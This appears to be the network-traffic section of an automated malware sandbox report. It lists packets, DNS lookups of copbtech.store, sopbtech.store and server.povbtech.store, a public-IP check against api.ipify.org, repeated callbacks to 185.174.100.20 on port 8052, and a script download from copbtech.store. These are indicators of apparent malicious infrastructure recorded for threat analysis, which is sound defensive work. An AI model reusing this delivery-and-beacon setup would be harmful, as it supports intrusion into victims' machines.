Jan 22, 2025 12:02:49.960927010 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:49.960978985 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.961488008 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.961780071 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:49.961869001 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:49.961916924 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:50.004383087 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:50.004410982 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:06.596425056 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:06.608172894 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:06.608417034 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:06.608747005 CET	49772	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:06.608793974 CET	443	49772	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:06.612257957 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:06.612313032 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:06.612390995 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:06.612873077 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:06.612889051 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.328855991 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.329134941 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:07.329164028 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.329499006 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.329797983 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:07.329866886 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.329945087 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:07.371356964 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.892019033 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.892112017 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:07.892234087 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:07.893182039 CET	49785	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:07.893203020 CET	443	49785	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:16.237005949 CET	49724	80	192.168.2.4	199.232.210.172
Jan 22, 2025 12:03:16.242194891 CET	80	49724	199.232.210.172	192.168.2.4
Jan 22, 2025 12:03:16.242260933 CET	49724	80	192.168.2.4	199.232.210.172
Jan 22, 2025 12:03:17.846275091 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:17.846313953 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:18.221268892 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:03:18.226104975 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:03:18.786276102 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:18.786314964 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:18.786362886 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:18.786362886 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:20.730995893 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:20.731021881 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:20.731100082 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:20.731324911 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:20.731337070 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:21.390655041 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:21.390932083 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:21.390995979 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:21.391537905 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:21.391840935 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:21.391936064 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:21.455528021 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:22.163975000 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.164004087 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.164084911 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.164449930 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.164462090 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.812047958 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.812319994 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.812352896 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.812833071 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.813121080 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.813200951 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:22.813256025 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:22.855360031 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:31.288264036 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:31.288324118 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:31.288398027 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:32.790122032 CET	49879	443	192.168.2.4	142.250.185.164
Jan 22, 2025 12:03:32.790132999 CET	443	49879	142.250.185.164	192.168.2.4
Jan 22, 2025 12:03:39.234194040 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.234287977 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.234348059 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.237030029 CET	49890	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.237052917 CET	443	49890	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.240678072 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.240720987 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.240825891 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.241036892 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.241046906 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.968861103 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.969172955 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.969202995 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.969592094 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.969986916 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:39.970048904 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:39.970170021 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:40.011332989 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:40.376904011 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:40.376995087 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:03:40.377043962 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:40.378964901 CET	49995	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:03:40.378992081 CET	443	49995	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:03.236303091 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:04:03.241322041 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:04:07.541275978 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:07.541332960 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:07.541400909 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:07.543456078 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:07.543471098 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:08.274434090 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:08.315836906 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:08.329384089 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:08.329415083 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:08.329924107 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:08.331403971 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:08.331495047 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:08.333415031 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:08.375334978 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.284487963 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.284595966 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.284796000 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.285646915 CET	50045	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.285691023 CET	443	50045	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.289401054 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.289453030 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.289566994 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.289809942 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.289828062 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.920212030 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.920507908 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.920564890 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.921384096 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.921655893 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.921742916 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.921792984 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:24.963349104 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:24.971124887 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:25.409151077 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:25.409251928 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:25.409303904 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:25.468704939 CET	50046	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:04:25.468751907 CET	443	50046	162.0.209.120	192.168.2.4
Jan 22, 2025 12:04:48.251595020 CET	49760	8052	192.168.2.4	185.174.100.20
Jan 22, 2025 12:04:48.256560087 CET	8052	49760	185.174.100.20	192.168.2.4
Jan 22, 2025 12:05:05.663714886 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:05.663824081 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:05.663923025 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:05.664203882 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:05.664242029 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:06.396302938 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:06.396647930 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:06.396687031 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:06.397026062 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:06.397325039 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:06.397382021 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:06.397471905 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:06.439340115 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:23.073704004 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:23.073805094 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:23.073995113 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:23.075853109 CET	50047	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:23.075875998 CET	443	50047	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:23.308398008 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:23.308449030 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:23.308527946 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:23.308821917 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:23.308835983 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.037416935 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.091041088 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.327085972 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.327168941 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.327764988 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.353380919 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.353566885 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.353761911 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.393244982 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.695749998 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.695858002 CET	443	50048	162.0.209.120	192.168.2.4
Jan 22, 2025 12:05:24.695909023 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.697009087 CET	50048	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:05:24.697026014 CET	443	50048	162.0.209.120	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 12:02:16.357429028 CET	53	55155	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:16.571367025 CET	52383	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:16.571594954 CET	58356	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:16.578316927 CET	53	58943	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:16.584544897 CET	53	58356	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:16.594366074 CET	53	52383	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:17.553363085 CET	53	62297	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:17.749028921 CET	63766	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:17.749361038 CET	62846	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:17.760987997 CET	53	63766	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:17.763457060 CET	53	62846	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:20.659859896 CET	57118	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:20.660141945 CET	61801	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:20.666824102 CET	53	61801	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:20.667498112 CET	53	57118	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:27.781198978 CET	138	138	192.168.2.4	192.168.2.255
Jan 22, 2025 12:02:28.169970036 CET	65125	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:28.170207024 CET	54756	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:28.181332111 CET	53	54756	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:28.181840897 CET	53	65125	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:28.995033026 CET	53	58934	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:29.619304895 CET	53	50496	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:30.781639099 CET	58608	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:30.781842947 CET	51285	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:30.783036947 CET	53	59350	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:30.788415909 CET	53	51285	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:30.788722038 CET	53	58608	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:31.562041044 CET	52115	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:31.562201023 CET	59891	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:31.568938017 CET	53	59891	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:31.568950891 CET	53	52115	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:31.596055031 CET	55954	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:31.596282005 CET	60509	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:31.606950045 CET	53	55954	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:31.609477997 CET	53	60509	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:32.483124971 CET	54420	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:32.483277082 CET	53508	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:32.489940882 CET	53	54420	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:32.490298986 CET	53	53508	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:33.220376015 CET	60932	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:33.220453024 CET	49769	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:02:33.227099895 CET	53	60932	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:33.227116108 CET	53	49769	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:34.624182940 CET	53	58689	1.1.1.1	192.168.2.4
Jan 22, 2025 12:02:53.610938072 CET	53	53117	1.1.1.1	192.168.2.4
Jan 22, 2025 12:03:16.029972076 CET	53	51354	1.1.1.1	192.168.2.4
Jan 22, 2025 12:03:16.691385984 CET	53	60065	1.1.1.1	192.168.2.4
Jan 22, 2025 12:03:20.722949982 CET	57930	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:03:20.723078966 CET	56230	53	192.168.2.4	1.1.1.1
Jan 22, 2025 12:03:20.729728937 CET	53	56230	1.1.1.1	192.168.2.4
Jan 22, 2025 12:03:20.730242014 CET	53	57930	1.1.1.1	192.168.2.4
Jan 22, 2025 12:03:47.076508999 CET	53	61262	1.1.1.1	192.168.2.4
Jan 22, 2025 12:04:33.563457012 CET	53	61699	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 22, 2025 12:02:16.571367025 CET	192.168.2.4	1.1.1.1	0x7ea	Standard query (0)	copbtech.store	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:16.571594954 CET	192.168.2.4	1.1.1.1	0x60f	Standard query (0)	copbtech.store	65	IN (0x0001)	false
Jan 22, 2025 12:02:17.749028921 CET	192.168.2.4	1.1.1.1	0x904c	Standard query (0)	copbtech.store	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:17.749361038 CET	192.168.2.4	1.1.1.1	0xfa9b	Standard query (0)	copbtech.store	65	IN (0x0001)	false
Jan 22, 2025 12:02:20.659859896 CET	192.168.2.4	1.1.1.1	0x716f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:20.660141945 CET	192.168.2.4	1.1.1.1	0xa737	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 22, 2025 12:02:28.169970036 CET	192.168.2.4	1.1.1.1	0xde9a	Standard query (0)	sopbtech.store	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:28.170207024 CET	192.168.2.4	1.1.1.1	0x8164	Standard query (0)	sopbtech.store	65	IN (0x0001)	false
Jan 22, 2025 12:02:30.781639099 CET	192.168.2.4	1.1.1.1	0xe6d	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:30.781842947 CET	192.168.2.4	1.1.1.1	0x5779	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 22, 2025 12:02:31.562041044 CET	192.168.2.4	1.1.1.1	0xb695	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.562201023 CET	192.168.2.4	1.1.1.1	0x2df9	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 22, 2025 12:02:31.596055031 CET	192.168.2.4	1.1.1.1	0xffa8	Standard query (0)	server.povbtech.store	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.596282005 CET	192.168.2.4	1.1.1.1	0x9526	Standard query (0)	_8052._https.server.povbtech.store	65	IN (0x0001)	false
Jan 22, 2025 12:02:32.483124971 CET	192.168.2.4	1.1.1.1	0xcb7d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.483277082 CET	192.168.2.4	1.1.1.1	0xada6	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Jan 22, 2025 12:02:33.220376015 CET	192.168.2.4	1.1.1.1	0xf38c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:33.220453024 CET	192.168.2.4	1.1.1.1	0xfb85	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Jan 22, 2025 12:03:20.722949982 CET	192.168.2.4	1.1.1.1	0x205e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:03:20.723078966 CET	192.168.2.4	1.1.1.1	0xf0ed	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 22, 2025 12:02:16.594366074 CET	1.1.1.1	192.168.2.4	0x7ea	No error (0)	copbtech.store		162.0.209.120	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:17.760987997 CET	1.1.1.1	192.168.2.4	0x904c	No error (0)	copbtech.store		162.0.209.120	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:20.666824102 CET	1.1.1.1	192.168.2.4	0xa737	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 22, 2025 12:02:20.667498112 CET	1.1.1.1	192.168.2.4	0x716f	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:28.181840897 CET	1.1.1.1	192.168.2.4	0xde9a	No error (0)	sopbtech.store		199.188.200.183	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:30.788722038 CET	1.1.1.1	192.168.2.4	0xe6d	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:30.788722038 CET	1.1.1.1	192.168.2.4	0xe6d	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:30.788722038 CET	1.1.1.1	192.168.2.4	0xe6d	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:30.788722038 CET	1.1.1.1	192.168.2.4	0xe6d	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.568950891 CET	1.1.1.1	192.168.2.4	0xb695	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.568950891 CET	1.1.1.1	192.168.2.4	0xb695	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.568950891 CET	1.1.1.1	192.168.2.4	0xb695	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.568950891 CET	1.1.1.1	192.168.2.4	0xb695	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.606950045 CET	1.1.1.1	192.168.2.4	0xffa8	No error (0)	server.povbtech.store		185.174.100.20	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:31.609477997 CET	1.1.1.1	192.168.2.4	0x9526	Name error (3)	_8052._https.server.povbtech.store	none	none	65	IN (0x0001)	false
Jan 22, 2025 12:02:31.611241102 CET	1.1.1.1	192.168.2.4	0xa045	No error (0)	shed.dual-low.s-part-0037.t-0009.t-msedge.net	s-part-0037.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 22, 2025 12:02:31.611241102 CET	1.1.1.1	192.168.2.4	0xa045	No error (0)	s-part-0037.t-0009.t-msedge.net		13.107.246.65	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.469765902 CET	1.1.1.1	192.168.2.4	0x3179	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 22, 2025 12:02:32.469765902 CET	1.1.1.1	192.168.2.4	0x3179	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.489940882 CET	1.1.1.1	192.168.2.4	0xcb7d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.489940882 CET	1.1.1.1	192.168.2.4	0xcb7d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.489940882 CET	1.1.1.1	192.168.2.4	0xcb7d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:32.490298986 CET	1.1.1.1	192.168.2.4	0xada6	No error (0)	api.ipify.org			65	IN (0x0001)	false
Jan 22, 2025 12:02:33.227099895 CET	1.1.1.1	192.168.2.4	0xf38c	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:33.227099895 CET	1.1.1.1	192.168.2.4	0xf38c	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:33.227099895 CET	1.1.1.1	192.168.2.4	0xf38c	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 22, 2025 12:02:33.227116108 CET	1.1.1.1	192.168.2.4	0xfb85	No error (0)	api.ipify.org			65	IN (0x0001)	false
Jan 22, 2025 12:03:20.729728937 CET	1.1.1.1	192.168.2.4	0xf0ed	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 22, 2025 12:03:20.730242014 CET	1.1.1.1	192.168.2.4	0x205e	No error (0)	www.google.com		142.250.185.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

copbtech.store

sopbtech.store

code.jquery.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:02:17 UTC	497	OUT	GET /tsk/xls/t1s2kc2v.js HTTP/1.1 Host: copbtech.store Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:02:17 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Sun, 19 Jan 2025 22:17:48 GMT accept-ranges: bytes content-length: 46403 date: Wed, 22 Jan 2025 11:02:17 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
